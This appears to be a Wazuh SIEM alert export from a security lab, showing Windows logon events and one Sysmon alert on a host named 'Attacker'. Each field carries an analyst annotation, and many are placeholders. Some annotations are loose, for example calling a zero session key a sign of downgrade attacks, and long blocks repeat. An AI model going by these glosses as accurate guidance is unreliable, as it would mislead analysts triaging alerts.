The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533922.306163 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:45:45.2693434Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43634 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4884 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Suspicious Windows cmd shell execution Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92032 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087', 'T1059.003'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery', 'Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery', 'Windows Command Shell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533922.313499 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:36:54.6551986Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 212047 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-17 16:36:54.622
ProcessGuid: {94294ddc-2e26-6801-dc07-000000000e00}
ProcessId: 9800
Image: C:\Windows\System32\conhost.exe
FileVersion: 10.0.26100.3624 (WinBuild.160101.0800)
Description: Console Window Host
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: CONHOST.EXE
CommandLine: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
CurrentDirectory: C:\WINDOWS
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=EDDF1F02AF16312858678F31843F1CAB05A6DF47D9BA15C0AA117F583E669D9D
ParentProcessGuid: {94294ddc-2e25-6801-d807-000000000e00}
ParentProcessId: 4044
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat""
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-17 16:36:54.622 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-2e26-6801-dc07-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9800 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\conhost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3624 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Console Window Host No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: CONHOST.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\WINDOWS No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=EDDF1F02AF16312858678F31843F1CAB05A6DF47D9BA15C0AA117F583E669D9D No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-2e25-6801-d807-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 4044 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\cmd.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\Program Files\\VMware\\VMware Tools\\resume-vm-default.bat\"\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533923.318979 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:46:17.3947487Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43643 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 9160 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Length of the session key generated at logon (e.g., 128‑bit). 0 means no session key was requested, as with this local service logon; an unexpectedly short key on a network logon can point to a downgraded authentication protocol.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533923.326315 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:46:31.0469437Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43645 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 9160 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Length of the session key generated at logon (e.g., 128‑bit). 0 means no session key was requested, as with this local service logon; an unexpectedly short key on a network logon can point to a downgraded authentication protocol.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533923.333651 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:46:35.7410981Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43647 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 9160 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
